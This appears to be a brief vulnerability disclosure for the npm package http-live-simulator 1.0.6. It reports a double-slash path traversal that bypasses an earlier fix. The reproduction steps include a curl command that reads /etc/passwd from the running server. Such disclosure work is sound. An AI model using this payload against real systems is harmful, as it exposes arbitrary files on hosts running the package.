module name: http-live-simulatorversion:1.0.6npm page: https://www.npmjs.com/package/http-live-simulator
this vulnerability is a bypass for the one found in this report in version 1.0.5
1- Install the module : npm install -g http-live-simulator
2- Run the server : http-live
3- Attempt to access a file from outside that project’s directory, such as curl --path-as-is http://localhost:8080//../../../../etc/passwd
adding an extra /
after the URL like :
http://localhost:8080//../../../../etc/passwd
mention the double slashes after the port number
path traversal vulnerability leading to read access in arbitrary files on disk